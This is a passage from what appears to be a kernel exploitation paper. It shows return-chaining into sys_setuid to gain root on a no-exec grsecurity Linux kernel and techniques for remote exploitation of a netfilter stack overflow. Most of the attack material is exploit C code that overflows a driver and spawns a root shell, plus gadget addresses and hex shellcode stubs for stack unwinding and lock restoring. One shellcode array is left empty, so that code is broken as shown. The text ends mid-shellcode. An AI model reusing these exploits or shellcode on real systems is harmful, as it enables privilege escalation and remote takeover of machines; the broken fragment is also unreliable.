This time, though, we won't have any executable and controllable memory
area (no u_psargs array), so we're going to present a different technique
which doesn't require one. Even if the idea behind it applies well to any
no-exec and separated kernel/userspace environment, as we'll see shortly,
this approach is quite architecture- (stack management and function
call/return implementation) and operating system- (handling of
credentials) dependent.

Moreover, it requires a precise knowledge of the .text layout of the
running kernel, so at least a readable image (which is the default
situation on many distros, on Solaris, and on other operating systems we
checked) or a large or controlled infoleak is necessary.

The idea behind it is not much different from the theory behind
'ret-into-libc' or other userland exploiting approaches that attempt to
circumvent the non executability of heap and stack : as we know, Linux
associates credentials to each process in terms of numeric values :

< linux-2.6.15/include/linux/sched.h >

struct task_struct {
/* process credentials */
        uid_t uid,euid,suid,fsuid;
        gid_t gid,egid,sgid,fsgid;

< / > 

Sometimes a process needs to raise (or drop, for security reasons) its
credentials, so the kernel exports systemcalls to do that. 
One of those is sys_setuid :

< linux-2.6.15/kernel/sys.c >

asmlinkage long sys_setuid(uid_t uid)
{
        int old_euid = current->euid;
        int old_ruid, old_suid, new_ruid, new_suid;
        int retval;

        retval = security_task_setuid(uid, (uid_t)-1, (uid_t)-1,
                                      LSM_SETID_ID);
        if (retval)
                return retval;

        old_ruid = new_ruid = current->uid;
        old_suid = current->suid;
        new_suid = old_suid;

        if (capable(CAP_SETUID)) {              [1]
                if (uid != old_ruid && set_user(uid, old_euid != uid) < 0)
                        return -EAGAIN;
                new_suid = uid;
        } else if ((uid != current->uid) && (uid != new_suid))
                return -EPERM;

        if (old_euid != uid)
                current->mm->dumpable = suid_dumpable;
        current->fsuid = current->euid = uid;    [2] 
        current->suid = new_suid;

        proc_id_connector(current, PROC_EVENT_UID);

        return security_task_post_setuid(old_ruid, old_euid, old_suid,
                                         LSM_SETID_ID);
}

< / > 

As you can see, the 'security' checks (apart from the LSM security_*
entry points) are performed at [1] and, after those, at [2] the values of
fsuid and euid are set equal to the value passed to the function. 
sys_setuid is a system call, so, due to the systemcall convention,
parameters are passed in registers. More precisely, 'uid' will be passed
in '%ebx'. 
The idea is thus simple (and not different from 'ret-into-libc' [19] or 
other userspace page protection evading techniques like [20]) : if we
manage to get 0 into %ebx and to jump right into the middle of sys_setuid
(right after the checks) we should be able to change the 'euid' and
'fsuid' of our process and thus raise our privileges. 

Let's see the sys_setuid disassembly to better tune our idea :

c0120fd0:       b8 00 e0 ff ff          mov    $0xffffe000,%eax  [1]
c0120fd5:       21 e0                   and    %esp,%eax
c0120fd7:       8b 10                   mov    (%eax),%edx
c0120fd9:       89 9a 6c 01 00 00       mov    %ebx,0x16c(%edx)  [2]
c0120fdf:       89 9a 74 01 00 00       mov    %ebx,0x174(%edx)
c0120fe5:       8b 00                   mov    (%eax),%eax
c0120fe7:       89 b0 70 01 00 00       mov    %esi,0x170(%eax)
c0120fed:       6a 01                   push   $0x1
c0120fef:       8b 44 24 04             mov    0x4(%esp),%eax
c0120ff3:       50                      push   %eax
c0120ff4:       55                      push   %ebp
c0120ff5:       57                      push   %edi
c0120ff6:       e8 65 ce 0c 00          call   c01ede60
c0120ffb:       89 c2                   mov    %eax,%edx
c0120ffd:       83 c4 10                add    $0x10,%esp        [3]  
c0121000:       89 d0                   mov    %edx,%eax
c0121002:       5e                      pop    %esi
c0121003:       5b                      pop    %ebx
c0121004:       5e                      pop    %esi
c0121005:       5f                      pop    %edi
c0121006:       5d                      pop    %ebp
c0121007:       c3                      ret

At [1] the current process task_struct is taken from the kernel stack
value. At [2] the %ebx value is copied over the 'euid' and 'fsuid' members
of the struct. We have our return address, which is [1]. 
At that point we need to force somehow %ebx into being 0 (if we're not
lucky enough to have it already zero'ed).

To demonstrate this vulnerability we have used the local exploitable
buffer overflow in the dummy.c driver (KERN_IOCTL_STORE_CHUNK ioctl()
command). Since it's a stack based overflow we can chain multiple return
addresses, preparing a fake stack frame that we totally control. 
We need : 

 - a zero'ed %ebx : the easiest way to achieve that is to find a pop %ebx
   followed by a ret instruction [we control the stack] : 

		[*] c0100cd3:       5b      pop    %ebx
		[*] c0100cd4:       c3      ret

   we don't strictly need pop %ebx directly followed by ret, we may find a
   sequence of pops before the ret (and, among those, our pop %ebx). It is
   just a matter of preparing the right ZERO-layout for the pop sequence
   (to make it simple, add a ZERO 4-bytes sequence for any pop between the
   %ebx one and the ret)    

 - the return addr where to jump, which is the [1] address shown above

 - a 'ret-to-ret' padding to take care of the stack gap created at [3] by
   the function epilogue (%esp adding and register popping) :
	ret-to-ret pad:
		[*] 0xffffe413      c3      ret 

   (we could have used the above ret as well; this one is in the vsyscall
    page and was used in another exploit where we didn't need so much
    knowledge of the kernel .text.. it survived here :) )

 - the address of an iret instruction to return to userland (and a crafted
   stack frame for it, as we described above while discussing 'Stack
   Based' exploitation) :

		[*] c013403f:       cf      iret

Putting it all together, this is how our 'stack' should look to perform a
correct exploitation :

low addresses
            | ret-to-ret pad |
            | ret-to-ret pad |
            | .............. |
            | ret-to-pop ebx |
            | 0x00000000     |
            | ret-to-setuid  |
            | ret-to-ret pad |
            | ret-to-ret pad |
            | ret-to-ret pad |
            | .............  |
            | .............  |
            | ret-to-iret    |
            | fake-iret-frame|
high addresses

Once correctly returned to userspace we have successfully modified 'fsuid'
and 'euid' value, but our 'ruid' is still the original one. At that point
we simply re-exec ourselves to get euid=0 and then spawn the shell. 
Code follows :

< stuff/expl/grsec_noexec.c >

#include <sys/ioctl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>

#include "dummy.h"

#define DEVICE "/dev/dummy"
#define NOP 0x90
#define PAGE_SIZE 0x1000
#define STACK_SIZE 8192
//#define STACK_SIZE 4096

/* patch it at runtime */


#define RET_INTO_RET_STR   "\x3d\x28\x02\x00"
#define DUMMY              RET_INTO_RET_STR
#define ZERO               "\x00\x00\x00\x00"

/* 22ad3 */
#define RET_INTO_POP_EBX   "\xd3\x2a\x02\x00"
/* 1360 */
#define RET_INTO_IRET      "\x60\x13\x00\x00"
/* 227fc */
#define RET_INTO_SETUID    "\xfc\x27\x02\x00"

// do_eip at .text offset (to be checked)
// 0804864f
#define USER_CODE_OFFSET   "\x4f\x86\x04\x08"
#define USER_CODE_SEGMENT  "\x73\x00\x00\x00"
#define USER_EFLAGS        "\x46\x02\x00\x00"
#define USER_STACK_OFFSET  "\xbb\xbb\xbb\x00"
#define USER_STACK_SEGMENT "\x7b\x00\x00\x00"

/* sys_setuid - grsec kernel
   227fc:       89 e2                   mov    %esp,%edx
   227fe:       89 f1                   mov    %esi,%ecx
   22800:       81 e2 00 e0 ff ff       and    $0xffffe000,%edx
   22806:       8b 02                   mov    (%edx),%eax
   22808:       89 98 50 01 00 00       mov    %ebx,0x150(%eax)
   2280e:       89 98 58 01 00 00       mov    %ebx,0x158(%eax)
   22814:       8b 02                   mov    (%edx),%eax
   22816:       89 fa                   mov    %edi,%edx
   22818:       89 a8 54 01 00 00       mov    %ebp,0x154(%eax)
   2281e:       c7 44 24 18 01 00 00    movl   $0x1,0x18(%esp)
   22825:       00
   22826:       8b 04 24                mov    (%esp),%eax
   22829:       5d                      pop    %ebp
   2282a:       5b                      pop    %ebx
   2282b:       5e                      pop    %esi
   2282c:       5f                      pop    %edi
   2282d:       5d                      pop    %ebp
   2282e:       e9 ef d5 0c 00          jmp    efe22
   22833:       83 ca ff                or     $0xffffffff,%edx
   22836:       89 d0                   mov    %edx,%eax
   22838:       5f                      pop    %edi
   22839:       5b                      pop    %ebx
   2283a:       5e                      pop    %esi
   2283b:       5f                      pop    %edi
   2283c:       5d                      pop    %ebp
   2283d:       c3                      ret
*/


/* pop %ebx, ret - grsec
 * ffd1a884:       5b                      pop    %ebx
 * ffd1a885:       c3                      ret
 */

char *g_prog_name;

char kern_noexec_shellcode[] =

void re_exec(int useless)
{
  char *a[3] = { g_prog_name, "exec", NULL };
  execve(g_prog_name, a, NULL);
}

char *allocate_jump_stack(unsigned int jump_addr, unsigned int size)
{
  unsigned int round_addr = jump_addr & 0xFFFFF000;
  unsigned int diff       = jump_addr - round_addr;
  unsigned int len        = (size + diff + 0xFFF) & 0xFFFFF000;
  char *map_addr = mmap((void*)round_addr, len,
                        PROT_READ|PROT_WRITE,
                        MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0);
  if(map_addr == (char*)-1)
    return NULL;

  memset(map_addr, 0x00, len);

  return map_addr;
}

char *allocate_jump_code(unsigned int jump_addr, void* code,
                         unsigned int size)
{
  unsigned int round_addr = jump_addr & 0xFFFFF000;
  unsigned int diff       = jump_addr - round_addr;
  unsigned int len        = (size + diff + 0xFFF) & 0xFFFFF000;

  char *map_addr = mmap((void*)round_addr, len,
                        PROT_READ|PROT_WRITE|PROT_EXEC,
                        MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0);
  if(map_addr == (char*)-1)
    return NULL;

  memset(map_addr, NOP, len);
  memcpy(map_addr+diff, code, size);

  return map_addr + diff;
}

inline void patch_code_4byte(char *code, unsigned int offset,
                             unsigned int value)
{
  *((unsigned int *)(code + offset)) = value;
}

int main(int argc, char *argv[])
{
  if(argc > 1)
  {
    int ret;
    char *argvx[] = {"/bin/sh", NULL};
    ret = setuid(0);
    printf("euid=%d, ret=%d\n", geteuid(), ret);
    execve("/bin/sh", argvx, NULL);
  }

  signal(SIGSEGV, re_exec);

  g_prog_name = argv[0];
  char *stack_jump =
          allocate_jump_stack(ALTERNATE_STACK, PAGE_SIZE);
  if(stack_jump == NULL)
    fprintf(stderr, "Exiting: mmap failed");

  char *memory = malloc(PAGE_SIZE), *mem_orig;
  mem_orig = memory;

  memset(memory, 0xDD, PAGE_SIZE);

  struct device_io_ctl *ptr = (struct device_io_ctl*)memory;
  ptr->chunk_num = 9 + (sizeof(kern_noexec_shellcode)-1)/sizeof(struct
device_io_blk) + 1;
  printf("Chunk num: %d\n", ptr->chunk_num);
  ptr->type = 0xFFFFFFFF;

  memory += (sizeof(struct device_io_ctl) + sizeof(struct device_io_blk) *
             9);

  /* copy shellcode */
  memcpy(memory, kern_noexec_shellcode, sizeof(kern_noexec_shellcode)-1);

  int i, fd = open(DEVICE,  O_RDONLY);
  if(fd < 0)
    return 0;

  ioctl(fd, KERN_IOCTL_STORE_CHUNK, (unsigned long)mem_orig);
  return 0;
}

< / >

As we said, we have chosen the PaX security patches for Linux/x86, but
some of the theory presented works equally well in other situations. 
A slightly different exploiting approach was successfully used on
Solaris/SPARC. (we leave it as an 'exercise' for the reader ;)) 

---[ 3.2 - Remote Kernel Exploiting 

Writing a working and somehow reliable remote kernel exploit is an
exciting and interesting challenge. Keeping with the 'style' of this
paper we're going to propose here a couple of techniques and 'life notes'
that led us to succeed in writing an almost reliable, image
independent and effective remote exploit.

After the first draft of this paper, a couple of things changed, so some
of the information presented here could be outdated on the very latest
kernels (and compiler releases), but it is anyway a good base for the
discussion (we've added notes all around this chapter about changes and
updates in the recent releases of the linux kernel).

A couple of the ideas presented here converged into a real remote exploit
for the madwifi remote kernel stack buffer overflow [21], which we already
released [22] without examining the exploitation approaches used in too
much detail. This chapter can thus be seen both as the introduction
and the extension of that work. 
More precisely, we will also cover here the exploiting issues and
solutions when dealing with code running in interrupt context, which is
the most common running mode for network based code (interrupt handler,
softirq, etc) but which wasn't the case for the madwifi exploit.
The same ideas apply well to kernel thread context too.

Exploitation techniques and discussion are based on a stack based buffer
overflow on the Linux 2.6.* branch of kernels on the x86 architecture, but
can be reused in most of the conditions that let us take control over 
the instruction flow.

------[ 3.2.1 - The Network Context 

We begin with a few considerations about the typology of kernel code that 
we'll be dealing with. Most of that code runs in interrupt context (and
sometimes in a kernel thread context), so we have some 'limitations' :

  - we can't directly 'return-to-userspace', since we don't have a valid 
    current task pointer. Moreover, most of the time, we won't control the
    address space of the userland process we talk with. Nevertheless we
    can rely on some 'fixed' points, like the ELF header (given there's
    no PIE / .text randomization on the remote box)

  - we can't perform any action that might make the kernel path sleep
    (for example a memory fault access)

  - we can't directly call a system call 

  - we have to take into account kernel resource management, since such
    kinds of kernel paths usually acquire spinlocks or disable
    pre-emption. We have to restore them to a stable state.

Logically, since we are remote, we don't have any information about
structs or kernel path addresses, so, since a good infoleak is usually
a not very probable situation, we can't rely on them. 

We have prepared a crafted example that will let us introduce all the
techniques involved in solving the problems just stated. We chose to write
a netfilter module, since quite a lot of the network kernel code depends
on it and it's the main framework for third-party modules. 

< stuff/drivers/linux/remote/dummy_remote.c >

#define MAX_TWSKCHUNK 30
#define TWSK_PROTO    37

struct twsk_chunk
{
  int type;
  char buff[12];
};

struct twsk
{
  int chunk_num;
  struct twsk_chunk chunk[0];
};

static int process_twsk_chunk(struct sk_buff *buff)
{
  struct twsk_chunk chunks[MAX_TWSKCHUNK];

  struct twsk *ts = (struct twsk *)((char*)buff->nh.iph +
                                    (buff->nh.iph->ihl * 4));

  if(ts->chunk_num > MAX_TWSKCHUNK)                                   [1]
    return (NF_DROP);

  printk(KERN_INFO "Processing TWSK packet: packet frame n. %d\n",
         ts->chunk_num);

  memcpy(chunks, ts->chunk, sizeof(struct twsk_chunk) * ts->chunk_num); [2] 

  // do somethings..

  return (NF_ACCEPT);
}

< / >

We have a signedness issue at [1], which triggers a later buffer overflow
at [2], writing past the local 'chunks' buffer. 
As we just said, we must know everything about the vulnerable function :
when it runs, under which 'context' it runs, what calls what, how
the stack looks, whether there are spinlocks or other control 
management objects acquired, etc.

A good starting point is dumping a stack trace at calling time of our
function :

#1  0xc02b5139 in nf_iterate (head=0xc042e4a0, skb=0xc1721ad0, hook=0, [1]
    indev=0xc1224400, outdev=0x0, i=0xc1721a88,
    okfn=0xc02bb150 <ip_rcv_finish>, hook_thresh=-2147483648)
    at net/netfilter/core.c:89
#2  0xc02b51b9 in nf_hook_slow (pf=2, hook=1, pskb=0xc1721ad0,         [2] 
    indev=0xc1224400, outdev=0x0, okfn=0xc02bb150 <ip_rcv_finish>,
    hook_thresh=-2147483648) at net/netfilter/core.c:125
#3  0xc02baee3 in ip_rcv (skb=0xc1bc4a40, dev=0xc1224400, pt=0xc0399310,
    orig_dev=0xc1224400) at net/ipv4/ip_input.c:348
#4  0xc02a5432 in netif_receive_skb (skb=0xc1bc4a40) at
#5  0xc024d3c2 in rtl8139_rx (dev=0xc1224400, tp=0xc1224660, budget=64)
    at drivers/net/8139too.c:2030
#6  0xc024d70e in rtl8139_poll (dev=0xc1224400, budget=0xc1721b78)
    at drivers/net/8139too.c:2120
#7  0xc02a5633 in net_rx_action (h=0xc0417078) at net/core/dev.c:1739
#8  0xc0118a75 in __do_softirq () at kernel/softirq.c:95
#9  0xc0118aba in do_softirq () at kernel/softirq.c:129                [3]
#10 0xc0118b7d in irq_exit () at kernel/softirq.c:169
#11 0xc0104212 in do_IRQ (regs=0xc1721ad0) at arch/i386/kernel/irq.c:110
#12 0xc0102b0a in common_interrupt () at current.h:9
#13 0x0000110b in ?? ()

Our vulnerable function (just like any other hook) is called serially by
the nf_iterate one [1], during the processing of a softirq [3], through
the netfilter core interface nf_hook_slow [2]. 
It is installed in the INPUT chain and, thus, it starts processing packets
whenever they are sent to the host box, as we see from [2] where pf = 2
(PF_INET) and hook = 1 (NF_IP_LOCAL_IN). 

Our final goal is to execute some kind of code that will establish a
connection back to us (or bind a port to a shell, or whatever kind of
shellcode you like more for your remote exploit). Trying to execute it
directly from kernel land is obviously a painful idea, so we need to
hijack some userland process (remember that we are on top of a softirq,
so we have no clue about what's really beneath us; it could equally be a
kernel thread or the idle task, for example) as our victim, inject some
code inside it and force the kernel to call it later on, when we're out
of the asynchronous event.

That means that we need an intermediary step between taking control
over the flow at 'softirq time' and executing from the userland process. 
But let's go in order : first of all we need to _start executing_ at
least the entry point of our shellcode. 

As is nowadays done in many exploits that have to fight against address
space randomization in the absence of infoleaks, we look for a jump to a 
jmp *%esp or push reg/ret or call reg sequence, to start executing from a
known point.
To avoid guessing the right return value, a nop-alike padding of
ret-into-ret addresses can be used. But we still need to find those
opcodes in a 'fixed' and known place.

The 2.6 branch of kernels introduced a fixed page [*] to support
the 'sysenter' instruction, the 'vsyscall' one :

bfe37000-bfe4d000 rwxp bfe37000 00:00 0          [stack]
ffffe000-fffff000 ---p 00000000 00:00 0          [vdso]

which is located at a fixed address : 0xffffe000 - 0xfffff000. 

[*] At time of release this is no longer true on the latest kernels,
    since the address of the vsyscall page is randomized starting from
    2.6.18. 

The 'vsyscall' page is a godsend for our 'entry point' shellcode, since we
can locate inside it the required opcodes [*] to start executing : 

(gdb) x/i 0xffffe75f
0xffffe75f:     jmp    *%esp
(gdb) x/i 0xffffe420
0xffffe420:     ret

[*] After testing the addresses of those opcodes on a wide range of 
    kernels/compilers, we discovered that sometimes they were not in the
    expected place or, in one case, even not present. This could be the
    only guessing part you could be facing (also due to vsyscall
    randomization, as we said in the note before), but there are
    (depending on the situation) other possibilities [fixed start of the
    kernel image, fixed .text of the 'running process' if out of
    interrupt context, etc].

To better figure out how the layout of the stack should look after the
overflow, here is a small schema :

|             |
|             |
| JMP -N      |-------+     # N is the size of the buffer plus some bytes
|             |       |       (ret-to-ret chain + jmp space)
|             |       |
| ret-to-jmp  |<-+    |     # the address of the jmp *%esp inside vsyscall
|             |  |    |
| .........   | -+    |
|             |  |    |
| ret-to-ret  | -+    |     # the address of 'ret' inside vsyscall 
|             |  |    |
| ret-to-ret  | -+    |
|             |       |
| overwritten |       |     # ret-to-ret padding starting from there
| ret address |       |
|             |       |
|             |       |
|      ^      |       |
|      |      |       |     # shellcode is placed inside the buffer
|             |       |       because it's huge, but it could also be
|  shellcode  |       |       splitted before and after the ret addr.
|   nop       |       |
|   nop       |<------+

At that point we control the flow, but we're still inside the softirq, so
we need to perform a couple of tasks to cleanly get our connect-back
shellcode executed :

  - find a way to cleanly get out from the softirq, since we trashed the 
    stack
  - locate the resource management objects that have been modified (if
    they've been) and restore them to a safe state
  - find a place where we can store our shellcode until later execution 
    from a 'process context' kernel path
  - find a way to force the before mentioned kernel path to execute our
    shellcode

The first step is the most difficult one (and wasn't necessary in the
madwifi exploit, since we weren't in interrupt context), because we've
overwritten the original return pointer and we have no clue about the
kernel text layout and addresses.

We're now going to present techniques and a working shellcode for each
one of the above points. [ Note that we have mentioned them in a
'conceptual order of importance', which is different from the real order
that we use inside the exploit. More precisely, they are almost in
reverse order, since the last step performed by our shellcode is
effectively getting out of the softirq. We felt that approach was more
explanatory; just remember this note during the following sub-chapters ] 

------[ 3.2.2 - Stack Frame Flow Recovery   

The goal of this technique is to unroll the stack, looking for some known
pattern, and to try to reconstruct a caller stack frame, register status
and instruction pointer, just to continue on with the normal flow. 
We need to restore the stack pointer to a known and consistent state,
restore register contents so that the function flow will exit cleanly,
and restore any lock or other synchronization object that was modified by
the functions between the one we overflowed in and the one we want to
'return to'.
Our stack layout (as seen from the dump pasted above) would basically be
that one :

stack layout
+---------------------+   bottom of stack
|                     |
| do_softirq()        |
| ..........          |             /* nf_hook_slow() stack frame */
| ..........          |             +------------------------+
|                     |             |  argN                  |
|                     |             |  ...                   |
| ip_rcv              |             |  arg2                  |
| nf_hook_slow        | =========>  |  arg1                  |
| ip_rcv_finish       |             |  ret-to-(ip_rcv())     |
| nf_iterate          |             |  saved reg1            |
|                     |             |  saved reg2            |
|                     |             |  ......                |
| ..............      |             +------------------------+
| ..............      |
| process_twsk_chunk  |
|                     |
+---------------------+  top of stack

As we said, we need to locate a function in the previous stack frames, not
too far from our overflowing one, having some 'good pattern' that would
help us in our search.
Our best bet, in that situation, is to check parameter passing : 

#2  0xc02b51b9 in nf_hook_slow (pf=2, hook=1, pskb=0xc1721ad0,
indev=0xc1224400, outdev=0x0, ....)

The 'nf_hook_slow()' function has a good 'signature' :              

  -  two consecutive dwords 0x00000002 and 0x00000001
  -  two kernel pointers (dword > 0xC0000000)
  -  a following NULL dword

We can rely on the fact that this pattern will be a constant, since
we're in the INPUT chain, processing incoming packets, and thus always
have a NULL 'outdev', pf = 2 and hook = 1.
Parameter passing is logically not the only 'signature' possible :
depending on the situation you could find a common pattern in some local
variable (which would be even a better one, because we discovered that
some versions of GCC optimize out some parameters, passing them through
registers).

Scanning the stack backward from the process_twsk_chunk() frame up to
the nf_hook_slow() one, we can later set the %esp value to the place
where the return address of nf_hook_slow() is saved, and, once the
correct conditions are recreated, perform a 'ret' that will let us exit
cleanly.
We said 'once the correct conditions are recreated' because the function
could expect some values inside registers (which we have to set) and
could expect some 'lock' or 'preemption state' different from the one we
had at the time of the overflow. Our task is thus to emulate/restore all
those requirements.

To achieve that, we can start checking how gcc restores registers during
function epilogue :

c02b6b30 <nf_hook_slow>:
c02b6b30:       55                      push   %ebp
c02b6b31:       57                      push   %edi
c02b6b32:       56                      push   %esi
c02b6b33:       53                      push   %ebx
c02b6bdb:       89 d8                   mov    %ebx,%eax
c02b6bdd:       5a                      pop    %edx       ==+
c02b6bde:       5b                      pop    %ebx         |
c02b6bdf:       5e                      pop    %esi         | restore
c02b6be0:       5f                      pop    %edi         |
c02b6be1:       5d                      pop    %ebp        =+
c02b6be2:       c3                      ret

This kind of epilogue, which is common for non-short functions, lets us
recover the state of the saved registers. Once we have found the 'ret'
value on the stack we can start 'rolling back', counting how many 'pop's
are there inside the text, to correctly restore those registers. [*]

[*] This is logically not the only possibility, one could set the values
    directly via movl, but sometimes you can't use 'predefined' values
    for those registers. As a side note, some versions of the gcc
    compiler don't use the push/pop prologue/epilogue, but translate the
    code as a sequence of movl (which needs a different handling from the
    shellcode).

To correctly do the 'unrolling' (and thus locate the pop sequence), we
need the kernel address of 'nf_hook_slow()'. This is not hard to
calculate, since we have already found its return address on the stack
(thanks to the signature pointed out before). Once again it is the Intel
calling convention which helps us :

c02bc8bd:       6a 02                   push   $0x2
c02bc8bf:       e8 6c a2 ff ff          call   c02b6b30 <nf_hook_slow>
c02bc8c4:       83 c4 1c                add    $0x1c,%esp

That small snippet of code is taken from ip_rcv(), which is the function
calling nf_hook_slow(). We have found the return address on the stack,
which is 0xc02bc8c4, so calculating the nf_hook_slow address is just a
matter of extracting the 'displacement' used in the relative call (opcode
0xe8, the standard calling convention in kernel gcc-compiled code) and
adding it to the return addr value (the INTEL relative call convention
adds the displacement to the current EIP) : 

[*] call to nf_hook_slow -> 0xe8 0x6c 0xa2 0xff 0xff 
[*] nf_hook_slow address -> 0xc02bc8c4 + 0xffffa26c = 0xc02b6b30 

To better understand the whole Stack Frame Flow Recovery approach here's
the shellcode stub doing it, with short comments :

 - Here we increment the stack pointer with the 'pop %eax' sequence and
   test for the known signature [ 0x2 0x1 X X 0x0 ].

"\x58"                  // pop    %eax
"\x83\x3c\x24\x02"      // cmpl   $0x2,(%esp)
"\x75\xf9"              // jne    loop
"\x83\x7c\x24\x04\x01"  // cmpl   $0x1,0x4(%esp)
"\x75\xf2"              // jne    loop
"\x83\x7c\x24\x10\x00"  // cmpl   $0x0,0x10(%esp)
"\x75\xeb"              // jne    loop
"\x8d\x64\x24\xfc"      // lea    0xfffffffc(%esp),%esp

 - get the return address, subtract 4 bytes and dereference the pointer
   to get the nf_hook_slow() displacement. Add it to the return address
   to obtain the nf_hook_slow() address. 

"\x8b\x04\x24"          // mov    (%esp),%eax
"\x89\xc3"              // mov    %eax,%ebx
"\x03\x43\xfc"          // add    0xfffffffc(%ebx),%eax

 - locate the 0xc3 opcode inside nf_hook_slow(), eliminating 'spurious'
   0xc3 bytes. In this shellcode we do a simple check for 'movl' opcodes
   and that's enough to avoid 'false positives'. With a larger shellcode
   one could write a small disassembly routine to perform a more precise
   locating of the 'ret' and 'pop' [see later]. 

"\x40"                  // inc    %eax
"\x8a\x18"              // mov    (%eax),%bl
"\x80\xfb\xc3"          // cmp    $0xc3,%bl
"\x75\xf8"              // jne    increment
"\x80\x78\xff\x88"      // cmpb   $0x88,0xffffffff(%eax)
"\x74\xf2"              // je     increment
"\x80\x78\xff\x89"      // cmpb   $0x89,0xffffffff(%eax)
"\x74\xec"              // je     increment

 - roll back from the located 'ret' up to the last pop instruction, if 
   any, and count the number of 'pop's.  

"\x31\xc9"              // xor    %ecx,%ecx
"\x48"                  // dec    %eax
"\x8a\x18"              // mov    (%eax),%bl
"\x80\xe3\xf0"          // and    $0xf0,%bl
"\x80\xfb\x50"          // cmp    $0x50,%bl
"\x75\x03"              // jne    end
"\x41"                  // inc    %ecx
"\xeb\xf2"              // jmp    pop
"\x40"                  // inc    %eax

 - use the calculated byte displacement from ret to rollback %esp value

"\x89\xc6"              // mov    %eax,%esi
"\x31\xc0"              // xor    %eax,%eax
"\xb0\x04"              // mov    $0x4,%al
"\xf7\xe1"              // mul    %ecx
"\x29\xc4"              // sub    %eax,%esp

 - set the return value 

"\x31\xc0"              // xor    %eax,%eax

 - call the nf_hook_slow() function epilogue

"\xff\xe6"              // jmp    *%esi

It is now time to pass to the 'second step', that is, restoring any
pending lock or other synchronization object to a consistent state for
the nf_hook_slow() function. 

------[ 3.2.3 - Resource Restoring 

In this phase we take care of restoring those resources that are
necessary for the 'hooked return function' (and its callers) to cleanly
get out from the softirq/interrupt state. 

Let's take another (closer) look at nf_hook_slow() : 

< linux-2.6.15/net/netfilter/core.c >

int nf_hook_slow(int pf, unsigned int hook, struct sk_buff **pskb,
                 struct net_device *indev,
                 struct net_device *outdev,
                 int (*okfn)(struct sk_buff *),
                 int hook_thresh)
{
        struct list_head *elem;
        unsigned int verdict;
        int ret = 0;

        /* We may already have this, but read-locks nest anyway */
        rcu_read_lock();		[1]

        ...

        rcu_read_unlock();		[2]
        return ret;			[3]
}

< / >

At [1] 'rcu_read_lock()' is invoked/acquired, but [2] 'rcu_read_unlock()'
is never performed, since at the 'Stack Frame Flow Recovery' step we
unrolled the stack and jumped back at [3]. 

'rcu_read_unlock()' is just an alias of preempt_enable(), which, in the 
end, results in a one-unit decrement of the preempt_count value inside
the thread_info struct :

< linux-2.6.15/include/linux/rcupdate.h >

#define rcu_read_lock()         preempt_disable()


#define rcu_read_unlock()       preempt_enable()

< / >

< linux-2.6.15/include/linux/preempt.h >

# define add_preempt_count(val) do { preempt_count() += (val); } while (0)
# define sub_preempt_count(val) do { preempt_count() -= (val); } while (0)


#define inc_preempt_count() add_preempt_count(1)
#define dec_preempt_count() sub_preempt_count(1)

#define preempt_count() (current_thread_info()->preempt_count)


#ifdef CONFIG_PREEMPT

asmlinkage void preempt_schedule(void);

#define preempt_disable() \
do { \
        inc_preempt_count(); \
        barrier(); \
} while (0)

#define preempt_enable_no_resched() \
do { \
        barrier(); \
        dec_preempt_count(); \
} while (0)

#define preempt_check_resched() \
do { \
        if (unlikely(test_thread_flag(TIF_NEED_RESCHED))) \
                preempt_schedule(); \
} while (0)

#define preempt_enable() \
do { \
        preempt_enable_no_resched(); \
        barrier(); \
        preempt_check_resched(); \
} while (0)

#else

#define preempt_disable()               do { } while (0)
#define preempt_enable_no_resched()     do { } while (0)
#define preempt_enable()                do { } while (0)
#define preempt_check_resched()         do { } while (0)

#endif

< / >   

As you can see, if CONFIG_PREEMPT is not set, all those operations are 
just no-ops. 'preempt_disable()' is nestable, so it can be called multiple
times (preemption will be disabled until we call 'preempt_enable()' the 
same number of times). That means that, given a PREEMPT kernel, we should
find a value equal to or greater than '1' inside preempt_count at 'exploit
time'. We can't just ignore that value, otherwise we'll BUG() later on
inside scheduler code (check preempt_schedule_irq() in kernel/sched.c). 
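The nestable-counter behaviour (and the reason we must never push the
counter below zero) can be modeled with a few lines of userland C. This is
just a sketch: the names only mirror the kernel ones, nothing here is real
kernel code.

```c
#include <assert.h>

/* Userland model of the nesting semantics: preempt_disable()
 * increments the per-thread counter, preempt_enable() decrements it,
 * and preemption is possible again only when it is back to zero. */
static int preempt_count = 0;

static void preempt_disable(void) { preempt_count++; }

static void preempt_enable(void)
{
        if (preempt_count > 0)          /* never go below zero: BUG() */
                preempt_count--;
}

/* replay the exploit situation: two nested disables (e.g. a lock plus
 * rcu_read_lock()), only the rcu one is 'restored' by the shellcode */
static int simulate_missed_unlock(void)
{
        preempt_count = 0;
        preempt_disable();              /* outer critical section      */
        preempt_disable();              /* nested rcu_read_lock()      */
        preempt_enable();               /* our by-hand rcu unlock      */
        return preempt_count;           /* outer disable still pending */
}
```

After the by-hand 'unlock' the counter is back to the value it had before
rcu_read_lock(), which is exactly the state the scheduler expects.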

What we have to do, on a PREEMPT kernel, is thus to locate 'preempt_count'
and decrement it, just like 'rcu_read_unlock()' would do. 
On the x86 architecture, 'preempt_count' is stored inside the 'struct 
thread_info' : 

< linux-2.6.15/include/asm-i386/thread_info.h >

struct thread_info {
        struct task_struct      *task;          /* main task structure */
        struct exec_domain      *exec_domain;   /* execution domain */
        unsigned long           flags;          /* low level flags */
        unsigned long           status;         /* thread-synchronous
                                                   flags */
        __u32                   cpu;            /* current CPU */
        int                     preempt_count;  /* 0 => preemptable, <0 =>
                                                   BUG */

        mm_segment_t            addr_limit;     /* thread address space:
                                                   0-0xBFFFFFFF for
                                                   user-thread,
                                                   0-0xFFFFFFFF for
                                                   kernel-thread
                                                */
        [...]
};

< / >

Let's see how we get to it : 

 - locate the thread_info 

"\x89\xe0"                 // mov %esp,%eax
"\x25\x00\xe0\xff\xff"     // and $0xffffe000,%eax

 - scan the thread_info to locate the addr_limit value. This value is a
   good fingerprint, since it is 0xc0000000 for a userland process and  
   0xffffffff for a kernel thread (or the idle task). [note that this kind 
   of scan can be used to figure out which kind of process we are in, 
   something that could be very important in some scenarios] 

/* scan: */
"\x83\xc0\x04"             // add $0x4,%eax
"\x8b\x18"                 // mov (%eax),%ebx
"\x83\xfb\xff"             // cmp $0xffffffff,%ebx
"\x74\x0a"                 // je 804851e <end>
"\x81\xfb\x00\x00\x00\xc0" // cmp $0xc0000000,%ebx
